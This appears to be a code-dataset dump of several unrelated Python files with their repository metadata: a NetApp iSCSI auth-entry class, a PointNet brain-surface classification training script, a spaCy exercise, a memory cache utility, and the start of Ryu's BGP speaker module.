"""
return self._auth_chap_policy
@auth_chap_policy.setter
def auth_chap_policy(self, val):
if val != None:
self.validate('auth_chap_policy', val)
self._auth_chap_policy = val
_initiator = None
@property
def initiator(self):
"""
Name of initiator. The initiator name must conform to
RFC 3720, for example:
"iqn.1987-06.com.initvendor1:appsrv.sn.2346",
or "default" if this is a default auth entry.
"""
return self._initiator
@initiator.setter
def initiator(self, val):
if val != None:
self.validate('initiator', val)
self._initiator = val
_vserver = None
@property
def vserver(self):
"""
Vserver containing this authentication information.
"""
return self._vserver
@vserver.setter
def vserver(self, val):
if val != None:
self.validate('vserver', val)
self._vserver = val
_auth_type = None
@property
def auth_type(self):
"""
Authentication type. Possible values: "CHAP", "none", "deny".
"""
return self._auth_type
@auth_type.setter
def auth_type(self, val):
if val != None:
self.validate('auth_type', val)
self._auth_type = val
_outbound_user_name = None
@property
def outbound_user_name(self):
"""
Outbound CHAP user name, returned only if auth-type is CHAP,
and outbound authentication is set for initiator.
"""
return self._outbound_user_name
@outbound_user_name.setter
def outbound_user_name(self, val):
if val != None:
self.validate('outbound_user_name', val)
self._outbound_user_name = val
@staticmethod
def get_api_name():
return "iscsi-security-entry-info"
@staticmethod
def get_desired_attrs():
return [
'user-name',
'auth-chap-policy',
'initiator',
'vserver',
'auth-type',
'outbound-user-name',
]
def describe_properties(self):
return {
'user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'auth_chap_policy': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator': { 'class': basestring, 'is_list': False, 'required': 'required' },
'vserver': { 'class': basestring, 'is_list': False, 'required': 'required' },
'auth_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'outbound_user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
| 30.052174 | 100 | 0.575521 | from netapp.netapp_object import NetAppObject
class IscsiSecurityEntryInfo(NetAppObject):
_user_name = None
@property
def user_name(self):
return self._user_name
@user_name.setter
def user_name(self, val):
if val != None:
self.validate('user_name', val)
self._user_name = val
_auth_chap_policy = None
@property
def auth_chap_policy(self):
return self._auth_chap_policy
@auth_chap_policy.setter
def auth_chap_policy(self, val):
if val != None:
self.validate('auth_chap_policy', val)
self._auth_chap_policy = val
_initiator = None
@property
def initiator(self):
return self._initiator
@initiator.setter
def initiator(self, val):
if val != None:
self.validate('initiator', val)
self._initiator = val
_vserver = None
@property
def vserver(self):
return self._vserver
@vserver.setter
def vserver(self, val):
if val != None:
self.validate('vserver', val)
self._vserver = val
_auth_type = None
@property
def auth_type(self):
return self._auth_type
@auth_type.setter
def auth_type(self, val):
if val != None:
self.validate('auth_type', val)
self._auth_type = val
_outbound_user_name = None
@property
def outbound_user_name(self):
return self._outbound_user_name
@outbound_user_name.setter
def outbound_user_name(self, val):
if val != None:
self.validate('outbound_user_name', val)
self._outbound_user_name = val
@staticmethod
def get_api_name():
return "iscsi-security-entry-info"
@staticmethod
def get_desired_attrs():
return [
'user-name',
'auth-chap-policy',
'initiator',
'vserver',
'auth-type',
'outbound-user-name',
]
def describe_properties(self):
return {
'user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'auth_chap_policy': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator': { 'class': basestring, 'is_list': False, 'required': 'required' },
'vserver': { 'class': basestring, 'is_list': False, 'required': 'required' },
'auth_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'outbound_user_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
| true | true |
1c4aa18bf302180255957ac3409b0d4e79760721 | 6,458 | py | Python | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | 7 | 2020-08-04T19:27:33.000Z | 2022-01-28T18:00:21.000Z | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | null | null | null | scripts/classification/PointNet/run_pointnet_classification.py | amiralansary/BrainSurfaceTK | 17e3ef5e1c5d6e1a75293fbe031977ec3fbe0fef | [
"MIT"
] | 3 | 2020-12-31T17:26:21.000Z | 2021-02-11T19:24:56.000Z | import os.path as osp
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..')
import sys
sys.path.append(PATH_TO_ROOT)
import os
import time
import pickle
import csv
import torch
from torch.optim.lr_scheduler import StepLR
from torch.utils.tensorboard import SummaryWriter
from models.pointnet.src.models.pointnet2_classification import Net
from models.pointnet.main.pointnet2_classification import train, test_classification
from models.pointnet.src.utils import get_data_path, data
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..') + '/'
PATH_TO_POINTNET = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..', '..', 'models', 'pointnet') + '/'
if __name__ == '__main__':
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..') + '/'
num_workers = 2
local_features = []
global_features = []
#################################################
########### EXPERIMENT DESCRIPTION ##############
#################################################
recording = False
REPROCESS = False
data_nativeness = 'native'
data_compression = "10k"
data_type = 'pial'
hemisphere = 'both'
comment = 'comment'
# additional_comment = ''
#################################################
############ EXPERIMENT DESCRIPTION #############
#################################################
# 1. Model Parameters
################################################
lr = 0.001
batch_size = 2
gamma = 0.9875
scheduler_step_size = 2
target_class = 'gender'
task = 'classification'
numb_epochs = 1
number_of_points = 10000
################################################
########## INDICES FOR DATA SPLIT #############
with open(PATH_TO_POINTNET + 'src/names.pk', 'rb') as f:
indices = pickle.load(f)
###############################################
data_folder, files_ending = get_data_path(data_nativeness, data_compression, data_type, hemisphere=hemisphere)
train_dataset, test_dataset, validation_dataset, train_loader, test_loader, val_loader, num_labels = data(
data_folder,
files_ending,
data_type,
target_class,
task,
REPROCESS,
local_features,
global_features,
indices,
batch_size,
num_workers=2,
data_nativeness=data_nativeness,
data_compression=data_compression,
hemisphere=hemisphere
)
if len(local_features) > 0:
numb_local_features = train_dataset[0].x.size(1)
else:
numb_local_features = 0
numb_global_features = len(global_features)
# 7. Create the model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(numb_local_features, numb_global_features).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
scheduler = StepLR(optimizer, step_size=scheduler_step_size, gamma=gamma)
print(f'number of param: {sum(p.numel() for p in model.parameters() if p.requires_grad)}')
#################################################
############# EXPERIMENT LOGGING ################
#################################################
writer = None
results_folder = None
if recording:
# Tensorboard writer.
writer = SummaryWriter(log_dir='runs/' + task + '/' + comment, comment=comment)
results_folder = 'runs/' + task + '/' + comment + '/results'
model_dir = 'runs/' + task + '/' + comment + '/models'
if not osp.exists(results_folder):
os.makedirs(results_folder)
if not osp.exists(model_dir):
os.makedirs(model_dir)
with open(results_folder + '/configuration.txt', 'w', newline='') as config_file:
config_file.write('Learning rate - ' + str(lr) + '\n')
config_file.write('Batch size - ' + str(batch_size) + '\n')
config_file.write('Local features - ' + str(local_features) + '\n')
config_file.write('Global feature - ' + str(global_features) + '\n')
config_file.write('Number of points - ' + str(number_of_points) + '\n')
config_file.write('Data res - ' + data_compression + '\n')
config_file.write('Data type - ' + data_type + '\n')
config_file.write('Data nativeness - ' + data_nativeness + '\n')
# config_file.write('Additional comments - With rotate transforms' + '\n')
with open(results_folder + '/results.csv', 'w', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Patient ID', 'Session ID', 'Prediction', 'Label', 'Error'])
#################################################
#################################################
best_val_acc = 0.0
# MAIN TRAINING LOOP
for epoch in range(1, numb_epochs + 1):
start = time.time()
train(model, train_loader, epoch, device,
optimizer, scheduler, writer)
val_acc = test_classification(model, val_loader,
indices['Val'], device,
recording, results_folder,
epoch=epoch)
if recording:
writer.add_scalar('Acc/val', val_acc, epoch)
end = time.time()
print('Time: ' + str(end - start))
if val_acc > best_val_acc:
best_val_acc = val_acc
torch.save(model.state_dict(), model_dir + '/model_best.pt')
print('Saving Model'.center(60, '-'))
writer.add_scalar('Time/epoch', end - start, epoch)
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
if recording:
# save the last model
torch.save(model.state_dict(), model_dir + '/model_last.pt')
# Eval best model on test
model.load_state_dict(torch.load(model_dir + '/model_best.pt'))
with open(results_folder + '/results.csv', 'a', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Best model!'])
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
| 36.485876 | 114 | 0.562713 | import os.path as osp
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..')
import sys
sys.path.append(PATH_TO_ROOT)
import os
import time
import pickle
import csv
import torch
from torch.optim.lr_scheduler import StepLR
from torch.utils.tensorboard import SummaryWriter
from models.pointnet.src.models.pointnet2_classification import Net
from models.pointnet.main.pointnet2_classification import train, test_classification
from models.pointnet.src.utils import get_data_path, data
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..') + '/'
PATH_TO_POINTNET = osp.join(osp.dirname(osp.realpath(__file__)), '..', '..', '..', 'models', 'pointnet') + '/'
if __name__ == '__main__':
PATH_TO_ROOT = osp.join(osp.dirname(osp.realpath(__file__)), '..') + '/'
num_workers = 2
local_features = []
global_features = []
recording = False
REPROCESS = False
data_nativeness = 'native'
data_compression = "10k"
data_type = 'pial'
hemisphere = 'both'
comment = 'comment'
lr = 0.001
batch_size = 2
gamma = 0.9875
scheduler_step_size = 2
target_class = 'gender'
task = 'classification'
numb_epochs = 1
number_of_points = 10000
with open(PATH_TO_POINTNET + 'src/names.pk', 'rb') as f:
indices = pickle.load(f)
data_folder, files_ending = get_data_path(data_nativeness, data_compression, data_type, hemisphere=hemisphere)
train_dataset, test_dataset, validation_dataset, train_loader, test_loader, val_loader, num_labels = data(
data_folder,
files_ending,
data_type,
target_class,
task,
REPROCESS,
local_features,
global_features,
indices,
batch_size,
num_workers=2,
data_nativeness=data_nativeness,
data_compression=data_compression,
hemisphere=hemisphere
)
if len(local_features) > 0:
numb_local_features = train_dataset[0].x.size(1)
else:
numb_local_features = 0
numb_global_features = len(global_features)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(numb_local_features, numb_global_features).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
scheduler = StepLR(optimizer, step_size=scheduler_step_size, gamma=gamma)
print(f'number of param: {sum(p.numel() for p in model.parameters() if p.requires_grad)}')
writer = None
results_folder = None
if recording:
writer = SummaryWriter(log_dir='runs/' + task + '/' + comment, comment=comment)
results_folder = 'runs/' + task + '/' + comment + '/results'
model_dir = 'runs/' + task + '/' + comment + '/models'
if not osp.exists(results_folder):
os.makedirs(results_folder)
if not osp.exists(model_dir):
os.makedirs(model_dir)
with open(results_folder + '/configuration.txt', 'w', newline='') as config_file:
config_file.write('Learning rate - ' + str(lr) + '\n')
config_file.write('Batch size - ' + str(batch_size) + '\n')
config_file.write('Local features - ' + str(local_features) + '\n')
config_file.write('Global feature - ' + str(global_features) + '\n')
config_file.write('Number of points - ' + str(number_of_points) + '\n')
config_file.write('Data res - ' + data_compression + '\n')
config_file.write('Data type - ' + data_type + '\n')
config_file.write('Data nativeness - ' + data_nativeness + '\n')
with open(results_folder + '/results.csv', 'w', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Patient ID', 'Session ID', 'Prediction', 'Label', 'Error'])
best_val_acc = 0.0
for epoch in range(1, numb_epochs + 1):
start = time.time()
train(model, train_loader, epoch, device,
optimizer, scheduler, writer)
val_acc = test_classification(model, val_loader,
indices['Val'], device,
recording, results_folder,
epoch=epoch)
if recording:
writer.add_scalar('Acc/val', val_acc, epoch)
end = time.time()
print('Time: ' + str(end - start))
if val_acc > best_val_acc:
best_val_acc = val_acc
torch.save(model.state_dict(), model_dir + '/model_best.pt')
print('Saving Model'.center(60, '-'))
writer.add_scalar('Time/epoch', end - start, epoch)
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
if recording:
torch.save(model.state_dict(), model_dir + '/model_last.pt')
model.load_state_dict(torch.load(model_dir + '/model_best.pt'))
with open(results_folder + '/results.csv', 'a', newline='') as results_file:
result_writer = csv.writer(results_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
result_writer.writerow(['Best model!'])
test_classification(model, test_loader, indices['Test'], device, recording, results_folder, val=False)
| true | true |
1c4aa2032c5c511a7b7e429659929c7288dac84f | 360 | py | Python | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | 1 | 2021-12-30T06:40:11.000Z | 2021-12-30T06:40:11.000Z | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | null | null | null | exercises/ja/solution_03_16_02.py | YanaPalacheva/spacy-course | 59975f7348a601532303be91474d75d02d0540ef | [
"MIT"
] | 1 | 2020-06-08T13:26:06.000Z | 2020-06-08T13:26:06.000Z | import spacy
nlp = spacy.load("en_core_web_sm")
text = (
"Chick-fil-A is an American fast food restaurant chain headquartered in "
"the city of College Park, Georgia, specializing in chicken sandwiches."
)
# taggerとparserを無効化する
with nlp.disable_pipes("tagger", "parser"):
# テキストを処理する
doc = nlp(text)
# docの固有表現をプリントする
print(doc.ents)
| 24 | 77 | 0.708333 | import spacy
nlp = spacy.load("en_core_web_sm")
text = (
"Chick-fil-A is an American fast food restaurant chain headquartered in "
"the city of College Park, Georgia, specializing in chicken sandwiches."
)
with nlp.disable_pipes("tagger", "parser"):
doc = nlp(text)
print(doc.ents)
| true | true |
1c4aa2704b6464d4b7b602bb5e3d69e965b711b1 | 3,835 | py | Python | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | 1 | 2015-02-05T13:43:46.000Z | 2015-02-05T13:43:46.000Z | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | null | null | null | src/python/Utils/MemoryCache.py | tslazarova/WMCore | a09e2aefe700fb9b0d12b9f7089b21bde5a5bd62 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple in-memory and non-thread safe cache.
Note that this module does not support home-made object types, since there is
an explicit data type check when adding a new item to the cache.
It raises a TypeError exception if the cache data type chagens;
or if the user tries to extend the cache with an incompatible
data type.
"""
from __future__ import (print_function, division)
from builtins import object
from time import time
class MemoryCacheException(Exception):
def __init__(self, message):
super(MemoryCacheException, self).__init__(message)
class MemoryCache(object):
__slots__ = ["lastUpdate", "expiration", "_cache"]
def __init__(self, expiration, initialData=None):
"""
Initializes cache object
:param expiration: expiration time in seconds
:param initialData: initial value for the cache
"""
self.lastUpdate = int(time())
self.expiration = expiration
self._cache = initialData
def __contains__(self, item):
"""
Check whether item is in the current cache
:param item: a simple object (string, integer, etc)
:return: True if the object can be found in the cache, False otherwise
"""
return item in self._cache
def isCacheExpired(self):
"""
Evaluate whether the cache has already expired, returning
True if it did, otherwise it returns False
"""
return self.lastUpdate + self.expiration < int(time())
def getCache(self):
"""
Raises an exception if the cache has expired, otherwise returns
its data
"""
if self.isCacheExpired():
expiredSince = int(time()) - (self.lastUpdate + self.expiration)
raise MemoryCacheException("Memory cache expired for %d seconds" % expiredSince)
return self._cache
def setCache(self, inputData):
"""
Refresh the cache with the content provided (refresh its expiration as well)
This method enforces the user to not change the cache data type
:param inputData: data to store in the cache
"""
if not isinstance(self._cache, type(inputData)):
raise TypeError("Current cache data type: %s, while new value is: %s" %
(type(self._cache), type(inputData)))
self.lastUpdate = int(time())
self._cache = inputData
def addItemToCache(self, inputItem):
"""
Adds new item(s) to the cache, without resetting its expiration.
It, of course, only works for data caches of type: list, set or dict.
:param inputItem: additional item to be added to the current cached data
"""
if isinstance(self._cache, set) and isinstance(inputItem, (list, set)):
# extend another list or set into a set
self._cache.update(inputItem)
elif isinstance(self._cache, set) and isinstance(inputItem, (int, float, str)):
# add a simple object (integer, string, etc) to a set
self._cache.add(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (list, set)):
# extend another list or set into a list
self._cache.extend(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (int, float, str)):
# add a simple object (integer, string, etc) to a list
self._cache.append(inputItem)
elif isinstance(self._cache, dict) and isinstance(inputItem, dict):
self._cache.update(inputItem)
else:
msg = "Input item type: %s cannot be added to a cache type: %s" % (type(self._cache), type(inputItem))
raise TypeError("Cache and input item data type mismatch. %s" % msg)
| 39.132653 | 114 | 0.642503 |
from __future__ import (print_function, division)
from builtins import object
from time import time
class MemoryCacheException(Exception):
def __init__(self, message):
super(MemoryCacheException, self).__init__(message)
class MemoryCache(object):
__slots__ = ["lastUpdate", "expiration", "_cache"]
def __init__(self, expiration, initialData=None):
self.lastUpdate = int(time())
self.expiration = expiration
self._cache = initialData
def __contains__(self, item):
return item in self._cache
def isCacheExpired(self):
return self.lastUpdate + self.expiration < int(time())
def getCache(self):
if self.isCacheExpired():
expiredSince = int(time()) - (self.lastUpdate + self.expiration)
raise MemoryCacheException("Memory cache expired for %d seconds" % expiredSince)
return self._cache
def setCache(self, inputData):
if not isinstance(self._cache, type(inputData)):
raise TypeError("Current cache data type: %s, while new value is: %s" %
(type(self._cache), type(inputData)))
self.lastUpdate = int(time())
self._cache = inputData
def addItemToCache(self, inputItem):
if isinstance(self._cache, set) and isinstance(inputItem, (list, set)):
self._cache.update(inputItem)
elif isinstance(self._cache, set) and isinstance(inputItem, (int, float, str)):
self._cache.add(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (list, set)):
self._cache.extend(inputItem)
elif isinstance(self._cache, list) and isinstance(inputItem, (int, float, str)):
self._cache.append(inputItem)
elif isinstance(self._cache, dict) and isinstance(inputItem, dict):
self._cache.update(inputItem)
else:
msg = "Input item type: %s cannot be added to a cache type: %s" % (type(self._cache), type(inputItem))
raise TypeError("Cache and input item data type mismatch. %s" % msg)
| true | true |
1c4aa339091f326094a1c407dad313c0bd77f65a | 52,647 | py | Python | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | ryu/services/protocols/bgp/bgpspeaker.py | starlingx-staging/stx-ryu | e73cdeab37d4890138f9c48bf41cf08974ab2146 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module offers a class to enable your code to speak BGP protocol.
"""
import netaddr
from ryu.lib import hub
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core_manager import CORE_MANAGER
from ryu.services.protocols.bgp.signals.emit import BgpSignalBus
from ryu.services.protocols.bgp.api.base import call
from ryu.services.protocols.bgp.api.base import PREFIX
from ryu.services.protocols.bgp.api.base import EVPN_ROUTE_TYPE
from ryu.services.protocols.bgp.api.base import EVPN_ESI
from ryu.services.protocols.bgp.api.base import EVPN_ETHERNET_TAG_ID
from ryu.services.protocols.bgp.api.base import REDUNDANCY_MODE
from ryu.services.protocols.bgp.api.base import IP_ADDR
from ryu.services.protocols.bgp.api.base import MAC_ADDR
from ryu.services.protocols.bgp.api.base import NEXT_HOP
from ryu.services.protocols.bgp.api.base import IP_PREFIX
from ryu.services.protocols.bgp.api.base import GW_IP_ADDR
from ryu.services.protocols.bgp.api.base import ROUTE_DISTINGUISHER
from ryu.services.protocols.bgp.api.base import ROUTE_FAMILY
from ryu.services.protocols.bgp.api.base import EVPN_VNI
from ryu.services.protocols.bgp.api.base import TUNNEL_TYPE
from ryu.services.protocols.bgp.api.base import PMSI_TUNNEL_TYPE
from ryu.services.protocols.bgp.api.prefix import EVPN_MAX_ET
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_LACP
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_L2_BRIDGE
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_MAC_BASED
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_AUTO_DISCOVERY
from ryu.services.protocols.bgp.api.prefix import EVPN_MAC_IP_ADV_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_MULTICAST_ETAG_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_SEGMENT
from ryu.services.protocols.bgp.api.prefix import EVPN_IP_PREFIX_ROUTE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_ALL_ACTIVE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_SINGLE_ACTIVE
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_VXLAN
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_NVGRE
from ryu.services.protocols.bgp.api.prefix import (
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP)
from ryu.services.protocols.bgp.api.prefix import (
FLOWSPEC_FAMILY,
FLOWSPEC_FAMILY_IPV4,
FLOWSPEC_FAMILY_VPNV4,
FLOWSPEC_FAMILY_IPV6,
FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN,
FLOWSPEC_RULES,
FLOWSPEC_ACTIONS)
from ryu.services.protocols.bgp.rtconf.common import LOCAL_AS
from ryu.services.protocols.bgp.rtconf.common import ROUTER_ID
from ryu.services.protocols.bgp.rtconf.common import CLUSTER_ID
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import (
DEFAULT_REFRESH_MAX_EOR_TIME, DEFAULT_REFRESH_STALEPATH_TIME)
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import REFRESH_MAX_EOR_TIME
from ryu.services.protocols.bgp.rtconf.common import REFRESH_STALEPATH_TIME
from ryu.services.protocols.bgp.rtconf.common import LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import ALLOW_LOCAL_AS_IN_COUNT
from ryu.services.protocols.bgp.rtconf.common import LOCAL_PREF
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LOCAL_PREF
from ryu.services.protocols.bgp.rtconf import neighbors
from ryu.services.protocols.bgp.rtconf import vrfs
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_EVPN
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_L2VPNFS
from ryu.services.protocols.bgp.rtconf.base import CAP_ENHANCED_REFRESH
from ryu.services.protocols.bgp.rtconf.base import CAP_FOUR_OCTET_AS_NUMBER
from ryu.services.protocols.bgp.rtconf.base import HOLD_TIME
from ryu.services.protocols.bgp.rtconf.base import MULTI_EXIT_DISC
from ryu.services.protocols.bgp.rtconf.base import SITE_OF_ORIGINS
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_MBGP_IPV4,
DEFAULT_CAP_MBGP_IPV6,
DEFAULT_CAP_MBGP_VPNV4,
DEFAULT_CAP_MBGP_VPNV6,
DEFAULT_CAP_MBGP_EVPN,
DEFAULT_CAP_MBGP_IPV4FS,
DEFAULT_CAP_MBGP_IPV6FS,
DEFAULT_CAP_MBGP_VPNV4FS,
DEFAULT_CAP_MBGP_VPNV6FS,
DEFAULT_CAP_MBGP_L2VPNFS,
DEFAULT_HOLD_TIME,
)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_ENHANCED_REFRESH, DEFAULT_CAP_FOUR_OCTET_AS_NUMBER)
from ryu.services.protocols.bgp.rtconf.neighbors import DEFAULT_CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import PEER_NEXT_HOP
from ryu.services.protocols.bgp.rtconf.neighbors import PASSWORD
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_SERVER_CLIENT, IS_ROUTE_SERVER_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_REFLECTOR_CLIENT, IS_ROUTE_REFLECTOR_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_NEXT_HOP_SELF, IS_NEXT_HOP_SELF)
from ryu.services.protocols.bgp.rtconf.neighbors import CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_ADDRESS
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_PORT
from ryu.services.protocols.bgp.rtconf.vrfs import SUPPORTED_VRF_RF
from ryu.services.protocols.bgp.info_base.base import Filter
from ryu.services.protocols.bgp.info_base.ipv4 import Ipv4Path
from ryu.services.protocols.bgp.info_base.ipv6 import Ipv6Path
from ryu.services.protocols.bgp.info_base.vpnv4 import Vpnv4Path
from ryu.services.protocols.bgp.info_base.vpnv6 import Vpnv6Path
from ryu.services.protocols.bgp.info_base.evpn import EvpnPath
NEIGHBOR_CONF_MED = MULTI_EXIT_DISC # for backward compatibility
RF_VPN_V4 = vrfs.VRF_RF_IPV4
RF_VPN_V6 = vrfs.VRF_RF_IPV6
RF_L2_EVPN = vrfs.VRF_RF_L2_EVPN
RF_VPNV4_FLOWSPEC = vrfs.VRF_RF_IPV4_FLOWSPEC
RF_VPNV6_FLOWSPEC = vrfs.VRF_RF_IPV6_FLOWSPEC
RF_L2VPN_FLOWSPEC = vrfs.VRF_RF_L2VPN_FLOWSPEC
# Constants for the Traffic Filtering Actions of Flow Specification.
FLOWSPEC_TA_SAMPLE = BGPFlowSpecTrafficActionCommunity.SAMPLE
FLOWSPEC_TA_TERMINAL = BGPFlowSpecTrafficActionCommunity.TERMINAL
# Constants for the VLAN Actions of Flow Specification.
FLOWSPEC_VLAN_POP = BGPFlowSpecVlanActionCommunity.POP
FLOWSPEC_VLAN_PUSH = BGPFlowSpecVlanActionCommunity.PUSH
FLOWSPEC_VLAN_SWAP = BGPFlowSpecVlanActionCommunity.SWAP
FLOWSPEC_VLAN_RW_INNER = BGPFlowSpecVlanActionCommunity.REWRITE_INNER
FLOWSPEC_VLAN_RW_OUTER = BGPFlowSpecVlanActionCommunity.REWRITE_OUTER
# Constants for the TPID Actions of Flow Specification.
FLOWSPEC_TPID_TI = BGPFlowSpecTPIDActionCommunity.TI
FLOWSPEC_TPID_TO = BGPFlowSpecTPIDActionCommunity.TO
class EventPrefix(object):
"""
Used to pass an update on any best remote path to
best_path_change_handler.
================ ======================================================
Attribute Description
================ ======================================================
remote_as The AS number of a peer that caused this change
route_dist None in the case of IPv4 or IPv6 family
prefix A prefix was changed
nexthop The nexthop of the changed prefix
label MPLS label for VPNv4, VPNv6 or EVPN prefix
path An instance of ``info_base.base.Path`` subclass
is_withdraw True if this prefix has gone otherwise False
================ ======================================================
"""
def __init__(self, path, is_withdraw):
self.path = path
self.is_withdraw = is_withdraw
@property
def remote_as(self):
return self.path.source.remote_as
@property
def route_dist(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.route_dist
else:
return None
@property
def prefix(self):
if isinstance(self.path, Ipv4Path) or isinstance(self.path, Ipv6Path):
return self.path.nlri.addr + '/' + str(self.path.nlri.length)
elif (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.prefix
else:
return None
@property
def nexthop(self):
return self.path.nexthop
@property
def label(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return getattr(self.path.nlri, 'label_list', None)
else:
return None
class BGPSpeaker(object):
def __init__(self, as_number, router_id,
bgp_server_hosts=DEFAULT_BGP_SERVER_HOSTS,
bgp_server_port=DEFAULT_BGP_SERVER_PORT,
refresh_stalepath_time=DEFAULT_REFRESH_STALEPATH_TIME,
refresh_max_eor_time=DEFAULT_REFRESH_MAX_EOR_TIME,
